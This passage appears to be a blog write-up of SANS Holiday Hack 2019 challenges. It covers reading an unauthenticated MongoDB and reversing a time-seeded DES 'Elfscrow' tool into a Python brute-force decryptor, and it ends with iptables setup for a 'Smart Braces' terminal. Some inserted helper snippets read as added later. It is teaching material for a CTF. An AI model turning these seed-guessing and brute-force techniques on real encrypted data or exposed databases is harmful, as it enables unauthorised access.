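        if arg.startswith("--port="):
            return int(arg.split("=", 1)[1])
    return default


# Command line copied from the untruncated ps output.
cmd = "/usr/bin/mongod --quiet --fork --port 12121 --bind_ip 127.0.0.1 --logpath=/tmp/mongo.log"
print(mongod_port(cmd))  # 12121
```

When no --port argument is present the function falls back to 27017, which is the default port the mongo shell tried first.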

elf@aa816f0ac957:~$ mongo --port 12121
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:12121/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        http://docs.mongodb.org/
Questions? Try the support group
        http://groups.google.com/group/mongodb-user
Server has startup warnings: 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is 'always'.
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] **        We suggest setting it to 'never'
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
>

And we’re in, perfect! Let’s list all the databases now to see if we can find the teacher’s database.

> show dbs
admin   0.000GB
config  0.000GB
elfu    0.000GB
local   0.000GB
test    0.000GB

The elfu database seems promising, so let’s select that one for use, and then list all the collections (MongoDB’s equivalent of tables) that are stored within that database.

> use elfu
switched to db elfu
> show collections
bait
chum
line
metadata
solution
system.js
tackle
tincan

Right away we spot the solution collection, so all we have to do is read it and list all the contents. We can use mongo’s db.collection.find() command for this.

What this command does is it selects documents in a collection or view and returns a cursor to the selected documents, which is simply a pointer to the result set of a query.

> db.solution.find()
{ "_id" : "You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **" }

Nice, so we seem to have found the solution! All we need to do is execute the command provided to us.

> db.loadServerScripts();displaySolution();
  
          .
       __/ __
            /
       /.'o'. 
        .o.'.
       .'.'o'.
      o'.o.'.*.
     .'.o.'.'.*.
    .o.'.o.'.o.'.
       [_____]
        ___/


  Congratulations!!

And there we have it, we completed the terminal challenge! Easy!

Recover Cleartext Document

Upon successfully completing the Mongo Pilfer CranPi we can talk to Holly again for more hints that will allow us to complete the next objective.

For this objective, we need to recover the plaintext content from this encrypted document. All we know is that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.

Upon looking into the objective we learn that the Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. Unfortunately we can’t get the source, but we do get some debug symbols that we can use.

Before we continue on with this challenge, I highly recommend you go and watch the Reversing Crypto the Easy Way KringleCon talk that was provided to us as a hint by Holly, as it will better help us understand what we need to do.

Since this is a Reverse Engineering challenge, I’ll do my best to explain how I completed the challenge. For me, solving this challenge involved utilizing both IDA and Immunity Debugger to better understand what is really going on under the hood of this encryption tool.

Overall, I might have complicated the process, but after doing my OSCE, I really liked making sure I fully understood how something works before I wrote an exploit or tool. So with that out of the way, let’s jump into it!

For starters, once you download the elfscrow.exe tool, we should play around with it to figure out how it works, what options we can use, and all that. If you downloaded this tool on Kali, then you can use wine to run the Windows exe.

root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe 
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

* WARNING: You're reading from stdin. That only partially works, use at your own risk!

** Please pick --encrypt or --decrypt!

Are you encrypting a file? Try --encrypt! For example:

  Z:\root\HH\elfscrow_crypto\elfscrow.exe --encrypt <infile> <outfile>

You'll be given a secret ID. Keep it safe! The only way to get the file
back is to use that secret ID to decrypt it, like this:

  Z:\root\HH\elfscrow_crypto\elfscrow.exe --decrypt --id=<secret_id> <infile> <outfile>

You can optionally pass --insecure to use unencrypted HTTP. But if you
do that, you'll be vulnerable to packet sniffers such as Wireshark that
could potentially snoop on your traffic to figure out what's going on!

From the start we can see that there are three options provided by this tool, --encrypt and --decrypt are self-explanatory, and then we also have --insecure which seems to use HTTP instead of HTTPS.

Okay, so let’s see what kind of traffic this tool generates. Let’s start up Wireshark, and attempt to decrypt the encrypted ElfU research PDF, while also passing the insecure parameter.

root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe --decrypt --id="test" ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc decrypted.pdf
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

Let's see if we can find your key...

Retrieving the key from: /api/retrieve

Uh oh, an error happened! Please don't tell Santa :(

HTTP 400: Bad identifier - must be a UUID

We can see that we need a valid UUID to be passed inside the id parameter to retrieve the key. Well, let’s take a look at the network traffic generated by this.

The network traffic doesn’t really reveal much to us, except the fact that it’s reaching out to an API endpoint (in this case /api/retrieve) to retrieve the decryption key for a provided UUID.
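To get a feel for what the server means by “must be a UUID”, here is a quick local check using Python’s standard uuid module. This is only a sketch: we don’t know how the server actually validates the id, and uuid.UUID is a bit more lenient than a strict format check (it also accepts the hex digits without hyphens).

```python
import uuid


def is_uuid(value):
    """Return True if Python's uuid module can parse the string as a UUID."""
    try:
        uuid.UUID(value)
    except ValueError:
        return False
    return True


print(is_uuid("test"))                                  # False
print(is_uuid("04b57639-e474-4276-8294-4aa9e0d6427f"))  # True
```

The second value is in the same format as the secret ids that elfscrow.exe hands out when it encrypts a file.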

Okay, well since we need a UUID, let’s go ahead and encrypt a test file to see what kind of data/keys are generated for us.

root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe --encrypt test.txt test.txt.enc --insecure
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

*** WARNING: This traffic is using insecure HTTP and can be logged with tools such as Wireshark

Our miniature elves are putting together random bits for your secret key!

Seed = 1578005170

Generated an encryption key: 8879363da3759d36 (length: 8)

Elfscrowing your key...

Elfscrowing the key to: elfscrow.elfu.org/api/store

Your secret id is 04b57639-e474-4276-8294-4aa9e0d6427f - Santa Says, don't share that key with anybody!
File successfully encrypted!

    ++=====================++
    ||                     ||
    ||      ELF-SCROW      ||
    ||                     ||
    ||                     ||
    ||                     ||
    ||     O               ||
    ||     |               ||
    ||     |   (O)-        ||
    ||     |               ||
    ||     |               ||
    ||                     ||
    ||                     ||
    ||                     ||
    ||                     ||
    ||                     ||
    ++=====================++

Okay, this has a lot of information we can use! We can see three very important items presented to us by this tool. First of all, we get the UUID that we need to retrieve the keys from the server, second of all we get our encryption key that is 8 bytes in length, and finally we also see a seed!

Usually this data shouldn’t be presented to the end user, because by having the key and seed we can try to figure out how the encryption works. That way, we can then write our own key generation tool that can be used to crack or decrypt files.

But hold on, that seed looks very odd. If we remember correctly, the objective states that the document was encrypted on December 6, 2019, between 7pm and 9pm UTC. What’s the chance that this seed is simply the current Unix time?

If we attempt to convert the seed to human readable time, we do in fact see that the seed is the current system time! Perfect, so we solved one piece of the puzzle!
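The conversion can be done with any epoch converter, but a couple of lines of Python work just as well. The helper name seed_to_utc is my own; the seed is the one printed by elfscrow.exe in the test run above.

```python
from datetime import datetime, timezone


def seed_to_utc(seed):
    """Interpret the seed as seconds since the Unix epoch, in UTC."""
    return datetime.fromtimestamp(seed, tz=timezone.utc)


seed = 1578005170  # "Seed = ..." line from the encryption run
print(seed_to_utc(seed).isoformat())  # 2020-01-02T22:46:10+00:00
```

January 2, 2020 lines up with the dates in the sqlmap logs earlier in this post, which is a strong hint that the seed is just the clock.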

Usually, using something like this as a seed isn’t really secure, as it’s easily enumerable and guessable and can lead to someone cracking your encryption if it’s not implemented properly.

Okay, so with the information we gathered here, let’s move over to a Windows VM and open the elfscrow encryption tool binary in IDA so we can utilize the debug symbols that came with it. This way we will be able to see the proper function names and variables used in the tool.

Once on Windows, after you open the elfscrow tool in IDA for disassembly, we can import the debug symbols by going to File -> Load file -> PDB file… which will open a new window.

In that new window, locate the elfscrow.pdb file that we downloaded, select it, and press OK.

If that loads successfully, then we should be able to see all function names used in the binary, instead of random junk like func_0123456.

Alright, so this is where stuff gets a little tricky since we will be diving directly into IDA. Using IDA should be pretty self-explanatory and I’ll try to explain as best as I can, but if you’d like, you can read the Reverse Engineering with Ida Pro slides by Chris Eagle to get a better idea of how to use it.

You can also read my Google CTF (2018): Beginners Quest - Reverse Engineering Solutions blog post as I go over how to use IDA for cross referencing functions and strings, finding strings, etc.

Upon looking into the function names in the Functions window on the left-hand side, we notice one very interesting function called generate_key. So let’s double click that, which should bring us to the disassembly window for that function definition.

Closely inspecting this, we can see that the time function is being called, and its result is being passed as a parameter into the super_secure_srand function. This function simply prints the epoch time to the screen, and sets that time as our seed for further use.

After that “secure random number” is generated, if we look a little further down the application flow path, we will see the following.

In loc_401E31 we see that the program is setting up a loop, as determined by the cmp or compare instruction. Notice that it is comparing the value in [ebp+var_4] to the value 8. If the compared value is equal to 8, we jmp or jump to loc_401E4F and call the generate_key function, otherwise we continue with the application flow to the left.

In the continued application flow within the loop we call the super_secure_random function. So that’s pretty interesting to us as it’s different from the “secure random” one we just saw.

So, if we double click on that function, we should be able to see the disassembly for it.

Note that I converted some of those values within that function from hex to decimal to better see what values are being passed into the registers.

From the top, we can see that the super_secure_random function is using the mov or move instruction to move the value of state into the eax register. In this case the state parameter would be our seed generated by the super_secure_srand function.

Next, it’s taking the state parameter and performing an imul against it, which simply performs a signed multiplication of two operands. In this case, state is multiplied by 214013 and the result is stored in the eax register.

Next, the binary performs a simple add instruction by adding 2531011 to the eax register. It’s then taking the value stored in eax and putting it back into our state variable, which will be used for our next loop iteration, hence the cmp instruction in loc_401E31 as we spoke about previously.

Next, the last few instructions in the function take the value in eax, which is our currently modified seed, and perform a bitwise AND operation against it with the value of 0x7FFFFFFF.

Once that’s done, the sar operation is carried out against the value in eax, which shifts the bits of the destination operand to the right by 16.

Finally, if we look back to the program flow, we will see that the movzx ecx, al instruction is carried out, which takes the least significant byte of eax (the al register), moves it zero-extended into ecx, and then carries out another bitwise AND operation against ecx by using the value of 0xFF.

Once that’s completed, this loop runs 8 times in total, and each iteration reuses the modified state value after the multiplication and addition manipulations were done to it.

Overall, seeing the application take the least significant byte of eax tells me that this might be 1 byte of the 8-byte generated key.
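To make the walkthrough a bit more concrete, here is a rough Python sketch of a single pass through that logic. It is my reading of the disassembly described above rather than recovered source; the function reuses the symbol name super_secure_random, and the 32-bit mask is there because eax is a 32-bit register while Python integers never overflow.

```python
def super_secure_random(state):
    """One generator step as described above; returns (new_state, key_byte)."""
    # imul eax, 214013 then add eax, 2531011, truncated to 32 bits like eax
    state = (state * 214013 + 2531011) & 0xFFFFFFFF
    # and eax, 0x7FFFFFFF followed by sar eax, 16
    value = (state & 0x7FFFFFFF) >> 16
    # movzx ecx, al followed by and ecx, 0xFF keeps only the low byte
    return state, value & 0xFF


state, key_byte = super_secure_random(0)
print(state, hex(key_byte))  # 2531011 0x26
```

Calling the function 8 times, each time feeding the returned state back in, would give the 8 bytes of a key.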

Alright, so we know what the application is doing, but first we need to figure out what kind of encryption this is, or what kind of generator we are using.

If we google the imul value of 214013 we will learn that this is a linear congruential generator, which is simply an algorithm that yields a sequence of pseudo-randomized numbers calculated with a discontinuous piecewise linear equation.

And if we follow the Wikipedia link, and look at the parameters in common use, we will see that this value is the multiplier used by Microsoft!

To validate this even further, in IDA if we press Shift+F12 and look through the strings, we validate that the Microsoft Enhanced Cryptographic Provider is being utilized!

Also, thankfully Microsoft provides us a table which highlights the differences between the encryption algorithms this provider can use.

If you look closely, we can see that DES, or the Data Encryption Standard, which is a symmetric-key algorithm, uses a key length of 56 bits. A DES key is stored as 8 bytes (64 bits), but one bit in each byte is a parity bit, which leaves 56 effective key bits. That matches the 8-byte key that the tool generated for us!
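As a quick sanity check on the 56-bit figure: a single DES key is stored as 8 bytes, and in the standard the least significant bit of every byte is a parity bit that does not take part in the encryption. The sketch below just does that arithmetic on the key from our earlier test run; strip_parity is a name I made up for illustration.

```python
def strip_parity(key):
    """Clear the low (parity) bit of every byte in an 8-byte DES key."""
    if len(key) != 8:
        raise ValueError("a single DES key is 8 bytes long")
    return bytes(byte & 0xFE for byte in key)


key = bytes.fromhex("8879363da3759d36")  # key printed by elfscrow.exe earlier
print(len(key) * 8)  # 64 bits stored
print(len(key) * 7)  # 56 bits that actually matter
print(strip_parity(key).hex())
```

So an 8-byte key and a 56-bit key length are two ways of describing the same thing.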

Okay awesome, so we know how the application generates its seed and its keys, and what encryption it uses. Now the question is, how can we write an exploit or tool to decrypt the document using this?

Well if we return to our previous google search and follow the first link from Rosetta Code, we will see that they provide code examples for creating linear congruential generators in many languages!

If we scroll down, we will find an example in Python!

Awesome! We actually have a code example that we can use to generate our keys!

So using what we learned from reverse engineering the application, and this code example, let’s write a simple proof of concept to generate a new key!

Since we encrypted a test file previously, let’s use the seed and key that were generated for us by the elfscrow tool. We do this so we can compare our output and make sure that it is in fact generating the correct key.

Once that’s done, our Python code will look like so:

def generate_key(seed):
	x = 0
	key = ""
	org_seed = seed
	while (x < 8):
		org_seed = (214013*seed + 2531011)
		seed = (214013*seed + 2531011) & 0x7fffffff
		seed = seed >> 16
		lsb = hex(seed & 0xFF)[2:]
		if (len(lsb) < 2):
			lsb = lsb.zfill(2)
		key += lsb
		seed = org_seed
		x += 1
	return key


seed = 1578008540
key = generate_key(seed)
print("Expected Key: 852b4834572d1d62")
print("Generated Key: " + key)

Once the script is completed, let’s execute it and see what we get!

root@kali:~/HH/elfscrow_crypto# python3 decrypt.py
Expected Key: 852b4834572d1d62
Generated Key: 852b4834572d1d62

Awesome, we have a working key generator that generates a valid key from our seed!

Now before we continue, some of you might be asking me what that lsb.zfill(2) line does.

Well, zfill simply pads a string on the left with zeros. This is done because during some of my reverse engineering efforts I noticed that when my script returned a least significant byte with a leading zero, such as 0x0F, hex() would strip the 0 and only pass f into the key.

So I implemented a little check. I simply check to see if my hex string is shorter than 2 characters. If it is, I know that there was a 0 stripped from it, and we use zfill to add it back.
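Here is a tiny demonstration of the problem and the fix, along with two standard-library alternatives that always produce two hex digits per byte. The helper name byte_to_hex is just for illustration.

```python
def byte_to_hex(value):
    """Format one byte as exactly two lowercase hex digits."""
    return format(value, "02x")


value = 0x0F
print(hex(value)[2:])           # f   (leading zero is lost)
print(hex(value)[2:].zfill(2))  # 0f  (the zfill fix used in the script)
print(byte_to_hex(value))       # 0f  (same result in one step)

# bytes.hex() handles a whole key at once
print(bytes([0x88, 0x79, 0x0F]).hex())  # 88790f
```

Any of these work; the important part is that every key byte ends up as two characters, otherwise bytes.fromhex() would later see a key of the wrong length.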

Cool, so we have the key generator working! Now all that’s left to do is to figure out the decryption. We already know that this is DES, but we need to figure out which mode of operation is used.

If we look back into the function names, we will see a function called do_decrypt. If we double click that function and follow the graph (application flow) we will spot that the application utilizes DES-CBC as per the CryptImportKey function.

Now all that’s left is to implement the decryption function in Python. This is easily implemented by using the single DES implementation from Python’s Crypto.Cipher package.

from Crypto.Cipher import DES
def decrypt(key, in_file, out_file):
	cipher = DES.new(bytes.fromhex(key), DES.MODE_CBC, b'\0'*8)
	infile = open(in_file, 'rb')
	data = infile.read()
	outfile = open(out_file, 'wb')
	print("Decrypting File...")
	outfile.write(cipher.decrypt(data))
	print("File Saved As: " + out_file)
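One detail the decrypt function above doesn’t handle is padding: a block cipher like DES works on 8-byte blocks, so the decrypted output can carry a few padding bytes at the end. The sketch below assumes PKCS#5-style padding (each padding byte holds the number of padding bytes), which I have not confirmed from the binary; strip_pkcs5 is a hypothetical helper and not part of the original script.

```python
def strip_pkcs5(data, block_size=8):
    """Remove PKCS#5-style padding; return data unchanged if it looks invalid."""
    if not data or len(data) % block_size:
        return data
    pad = data[-1]
    # Valid padding is N copies of the byte N, with 1 <= N <= block size.
    if 1 <= pad <= block_size and data.endswith(bytes([pad]) * pad):
        return data[:-pad]
    return data


print(strip_pkcs5(b"This is a test!\x01"))  # b'This is a test!'
```

For a PDF the extra bytes at the end are harmless in practice, which is why the script gets away without this step.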

Alright, now that we have that, we need to test this. So let’s start by creating a test file and encrypting it.

root@kali:~/HH/elfscrow_crypto# cat test.txt 
This is a test!
root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe --encrypt test.txt test.txt.enc
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

Our miniature elves are putting together random bits for your secret key!

Seed = 1578097585

Generated an encryption key: 6532547fb69b4569 (length: 8)

Elfscrowing your key...

Elfscrowing the key to: elfscrow.elfu.org/api/store

Your secret id is c2720899-057f-425a-bd25-2232c9e4f923 - Santa Says, don't share that key with anybody!
File successfully encrypted!

Okay so we encrypted a document called test.txt. We also have our seed and expected key. Let’s go ahead and update our Python script to use these values, and automatically decrypt our encrypted document, which we saved as test.txt.enc.

Our updated Python script will look something like this:

from Crypto.Cipher import DES

def generate_key(seed):
	x = 0
	key = ""
	org_seed = seed
	while (x < 8):
		org_seed = (214013*seed + 2531011)
		seed = (214013*seed + 2531011) & 0x7fffffff
		seed = seed >> 16
		lsb = hex(seed & 0xFF)[2:]
		if (len(lsb) < 2):
			lsb = lsb.zfill(2)
		key += lsb
		seed = org_seed
		x += 1
	return key

def decrypt(key, in_file, out_file):
	cipher = DES.new(bytes.fromhex(key), DES.MODE_CBC, b'\0'*8)
	infile = open(in_file, 'rb')
	data = infile.read()
	outfile = open(out_file, 'wb')
	print("Decrypting File...")
	outfile.write(cipher.decrypt(data))
	print("File Saved As: " + out_file)


print("DES CBC Elfscrow Decryptor")
print("===========================")
infile = input("Enter Encrypted File Name: ")
outfile = input("Enter Decrypted File Name: ")
seed = int(input("Enter Seed: "))  # input() returns a string, so convert it before doing arithmetic
key = generate_key(seed)
print("Expected Key: 6532547fb69b4569")
print("Generated Key: " + key)
decrypt(key, infile, outfile)

Alright, once updated let’s see if this works! If all goes well, the file we save the decrypted output to should read “This is a test!”. Let’s give it a shot!

root@kali:~/HH/elfscrow_crypto# python3 decrypt.py 
DES CBC Elfscrow Decryptor
===========================
Enter Encrypted File Name: test.txt.enc 
Enter Decrypted File Name: test_decode.txt
Enter Seed: 1578097585
Expected Key: 6532547fb69b4569
Generated Key: 6532547fb69b4569
Decrypting File...
File Saved As: test_decode.txt
root@kali:~/HH/elfscrow_crypto# cat test_decode.txt 
This is a test!
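As an aside, the key derivation can be written more compactly. The sketch below assumes the generator is the classic Microsoft C runtime rand() recurrence (the constants 214013 and 2531011 match it) and that each key byte is the low byte of one rand() result. The function name msvc_rand_key is my own and does not come from the binary.

```python
def msvc_rand_key(seed, length=8):
    """Derive `length` key bytes from an MSVC-style rand() stream (assumed)."""
    state = seed & 0xFFFFFFFF
    key = bytearray()
    for _ in range(length):
        # Linear congruential step, kept to 32 bits like a C unsigned int
        state = (214013 * state + 2531011) & 0xFFFFFFFF
        # rand() returns bits 16..30 of the state
        rand_value = (state >> 16) & 0x7FFF
        # Only the low byte of each rand() result goes into the key
        key.append(rand_value & 0xFF)
    return key.hex()


# Seed taken from the test encryption above
print(msvc_rand_key(1578097585))
```

With the seed from the test run, this should reproduce the key that elfscrow.exe reported, which makes it a handy sanity check before brute forcing.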

It works! Yes! All that’s left for us to do is to attempt decrypting the PDF document. We know that the document was encrypted on December 6, 2019, between 7pm and 9pm UTC. Knowing that, let’s work out the Unix timestamps for the start and end of that window so we can try every second in between as a seed.

Alright, we need to generate keys using every seed from 1575658800 to 1575666000. It should be pretty simple!
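If you want to double check those two numbers, a minimal sketch using only Python’s standard library is shown below. The helper name epoch_window is made up for this example.

```python
from datetime import datetime, timezone


def epoch_window():
    """Return (start, end) Unix timestamps for Dec 6, 2019, 7pm to 9pm UTC."""
    start = datetime(2019, 12, 6, 19, 0, tzinfo=timezone.utc)
    end = datetime(2019, 12, 6, 21, 0, tzinfo=timezone.utc)
    return int(start.timestamp()), int(end.timestamp())


start, end = epoch_window()
print(start, end)
```

Passing tzinfo explicitly matters here: without it, Python would interpret the times in the local timezone of whatever machine runs the script.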

Just one problem! How will we know if the PDF decrypts successfully? If we try to decrypt the data with a bad key, all we will get is junk.

Don’t fear, I already thought of that! 😊

We can use a Python package called filetype, which infers the file type and MIME type by checking the magic number signature of a file or buffer. After each decryption, we will save the file and check the magic bytes.

If the magic bytes are that of a PDF type, then we know the decryption was successful and we can stop the decryption process.
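To show what such a check boils down to, here is a hand-rolled sketch that does not use the filetype package at all. It relies on the fact that PDF files begin with the bytes %PDF-; the function name looks_like_pdf is hypothetical.

```python
PDF_MAGIC = b"%PDF-"


def looks_like_pdf(data: bytes) -> bool:
    """Return True if the buffer starts with the PDF magic bytes."""
    return data.startswith(PDF_MAGIC)


print(looks_like_pdf(b"%PDF-1.4\n%rest of the file"))  # a plausible PDF header
print(looks_like_pdf(b"\x8f\x12\xa0junk"))             # what a wrong key tends to give
```

Since only the first few bytes matter, a check like this could in principle be run on just the first decrypted block instead of the whole file.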

With that, let’s update our Python script for the final run! The script should look like so:

from Crypto.Cipher import DES
import filetype
import sys

def generate_key(seed):
	x = 0
	key = ""
	org_seed = seed
	while (x < 8):
		org_seed = (214013*seed + 2531011)
		seed = (214013*seed + 2531011) & 0x7fffffff
		seed = seed >> 16
		lsb = hex(seed & 0xFF)[2:]
		if (len(lsb) < 2):
			lsb = lsb.zfill(2)
		key += lsb
		seed = org_seed
		x += 1
	return key

def decrypt(key, in_file, out_file):
	cipher = DES.new(bytes.fromhex(key), DES.MODE_CBC, b'\0'*8)
	with open(in_file, 'rb') as infile:
		data = infile.read()
	print("[-] Decrypting File with Key: " + key)
	# Close (and flush) the output before filetype inspects it on disk
	with open(out_file, 'wb') as outfile:
		outfile.write(cipher.decrypt(data))
	kind = filetype.guess(out_file)
	if kind is not None and kind.mime == "application/pdf":
		print("[!] Decryption Successful!")
		print("File Saved As: " + out_file)
		sys.exit()
	print("[X] Decryption Failed!")


print("DES CBC Elfscrow Decryptor")
print("===========================")
# range() excludes its end value, so add 1 to include 9pm itself
for seed in range(1575658800, 1575666000 + 1):
	key = generate_key(seed)
	decrypt(key, "ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc", "DecryptedElfUResearch.pdf")

Alright, the moment of truth! Let’s kick this off and hope that all our hard work paid off!

root@kali:~/HH/elfscrow_crypto# python3 decrypt.py 
DES CBC Elfscrow Decryptor
===========================
[-] Decrypting File with Key: d7c21b323c209f0f
[X] Decryption Failed!
[-] Decrypting File with Key: dabfe3318676c8a0
[X] Decryption Failed!
[-] Decrypting File with Key: b2b1a232c7e9d25b
[X] Decryption Failed!
---snip---
[-] Decrypting File with Key: b5ad6a321240fbec
[!] Decryption Successful!
File Saved As: DecryptedElfUResearch.pdf

After some time, we can see that decryption was successful! Opening the DecryptedElfUResearch.pdf document confirms it: we can read the document!

Now that we have the decrypted document, we can read the middle line on the cover page. From here, we can navigate to the tenth objective in our badge and enter “Machine Learning Sleigh Route Finder” to complete the objective.

Objective 11

Smart Braces - CranPi

From Holly in the NetWars room, we go back out to the Quad, and go north into the Student Union where we meet Kent Tinseltooth.

Upon talking with Kent, we learn that someone might have hacked Kent’s IoT Smart Braces (really…) and is using that to talk to him.

Well Kent says that he wants us to take a look at the Smart Braces terminal, so let’s help this poor guy out before he loses his mind.

Upon accessing the CranPi terminal, we are presented with the following:

Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I'm talking to you, Kent.
Kent TinselTooth: Who said that? I must be going insane.
Kent TinselTooth: Am I?
Inner Voice: That remains to be seen, Kent. But we are having a conversation.
Inner Voice: This is Santa, Kent, and you've been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you've built an automated, machine-learning, sleigh device.
Kent TinselTooth: How did you know that?
Inner Voice: I'm Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That's right, Kent. Where is the sleigh device now?
Kent TinselTooth: I can't tell you.
Inner Voice: How would you like to intern for the rest of time?
Kent TinselTooth: Please no, they're testing it at srf.elfu.org using default creds, but I don't know more. It's classified.
Inner Voice: Very good Kent, that's all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you've researched and studied. From now on, stop playing with your teeth, and floss more.
*Inner Voice Goes Silent*
Kent TinselTooth: Oh no, I sure hope that voice was Santa's.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and help me configure the firewall.
Kent TinselTooth: Please hurry; having this ribbon cable on my teeth is uncomfortable.
elfuuser@d4664263e075:~$ 

Something’s not right, the “inner voice” must be the hacker… and it’s definitely not Santa! Kent said that we need to help configure the firewall on the braces. He also provided us a file to review for the firewall configuration which is located in /home/elfuuser/IOTteethBraces.md.

So let’s see what that contains.

elfuuser@d4664263e075:~$ ls
IOTteethBraces.md
elfuuser@d4664263e075:~$ cat IOTteethBraces.md 
# ElfU Research Labs - Smart Braces
### A Lightweight Linux Device for Teeth Braces
### Imagined and Created by ElfU Student Kent TinselTooth

This device is embedded into one's teeth braces for easy management and monitoring of dental status. It uses FTP and HTTP for management and monitoring purposes but also has SSH for remote access. Please refer to the management documentation for this purpose.

## Proper Firewall configuration:

The firewall used for this system is `iptables`. The following is an example of how to set a default policy with using `iptables`:

___
sudo iptables -P FORWARD DROP
___
The following is an example of allowing traffic from a specific IP and to a specific port:

___
sudo iptables -A INPUT -p tcp --dport 25 -s 172.18.5.4 -j ACCEPT
___

A proper configuration for the Smart Braces should be exactly:

1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

After reading the provided document, we learn that we need to configure iptables rules for the braces. We also learn that the proper configuration for the smart braces consists of exactly 6 requirements.

Alright, so let’s start with the first rule:

  1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.

In iptables, rules are grouped into chains (INPUT, OUTPUT and FORWARD). Network traffic relevant to a chain is checked against that chain’s rules in order, and the first matching rule decides what happens to the packet. These outcomes are referred to as targets; the two most common predefined targets are DROP to drop a packet and ACCEPT to accept it.

There are 3 predefined chains in the filter table to which we can add rules for processing IP packets passing through them. These chains are:

  • INPUT - All packets destined for the host computer.
  • OUTPUT - All packets originating from the host computer.
  • FORWARD - All packets neither destined for nor originating from the host computer, but passing through (routed by) the host computer. This chain is used if you are using your computer as a router.
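To make the idea of rules, targets and a fallback policy concrete, here is a toy model in Python. It is only an illustration of first-match evaluation, not how netfilter is implemented, and the evaluate function and packet dictionaries are invented for this example.

```python
def evaluate(chain_rules, default_policy, packet):
    """Return the target of the first matching rule, else the chain policy."""
    for match, target in chain_rules:
        # A rule matches when every field it names equals the packet's value
        if all(packet.get(field) == value for field, value in match.items()):
            return target
    return default_policy


# One INPUT rule modelled on requirement 3 from the braces document
input_rules = [
    ({"proto": "tcp", "dport": 22, "src": "172.19.0.225"}, "ACCEPT"),
]

allowed = {"proto": "tcp", "dport": 22, "src": "172.19.0.225"}
stranger = {"proto": "tcp", "dport": 22, "src": "10.0.0.1"}  # made-up address

print(evaluate(input_rules, "DROP", allowed))
print(evaluate(input_rules, "DROP", stranger))
```

The second packet matches no rule, so it falls through to the chain’s policy, which is why the default policy matters so much.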

Knowing this, we now need to set the default policy for each of these chains so that traffic is dropped by default unless it matches one of the specific rules we add later.

We can do this by passing iptables the -P or --policy option, which sets the policy for the chain to the given target. If any of this is confusing, I suggest reading the iptables man page as well as the iptables how-to.

The commands for these settings will look like so.

elfuuser@d4664263e075:~$ sudo iptables -P INPUT DROP
elfuuser@d4664263e075:~$ sudo iptables -P FORWARD DROP
elfuuser@d4664263e075:~$ sudo iptables -P OUTPUT DROP

Once that’s done, we can pass the -L option in iptables to list all the current rules and check if our changes were made.

elfuuser@d4664263e075:~$ sudo iptables -L
Chain INPUT (policy DROP)
target     prot opt source               destination         

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy DROP)
target     prot opt source               destination

Great, we now have our default policy set properly. Let’s move onto the next rule.

  2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.

For this rule we are matching on the connection state. Connection tracking is able to examine a packet and determine whether it is NEW, ESTABLISHED or RELATED.

  • NEW - The packet starts a new connection, for example the first packet of an incoming connection that the host system did not initiate.
  • ESTABLISHED and RELATED - The packet belongs to an already established connection, or is related to one. An example is the reply traffic that comes back after we open a web browser and go to Google.

Specifically, we have to ACCEPT traffic in these states. We can specify a match module in iptables with the -m option, followed by the module name. In this case we will be using the conntrack module, which is short for connection tracking.

With this module we can pass the --ctstate option followed by a comma-separated list of the connection states we want to match. Finally, we pass the -j option followed by the target (ACCEPT or DROP).

The commands for this should look like so:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
elfuuser@d4664263e075:~$ sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

Once again, we can pass the -L option in iptables to list all the current rules and check if our changes were made.

elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

Chain FORWARD (policy DROP)  
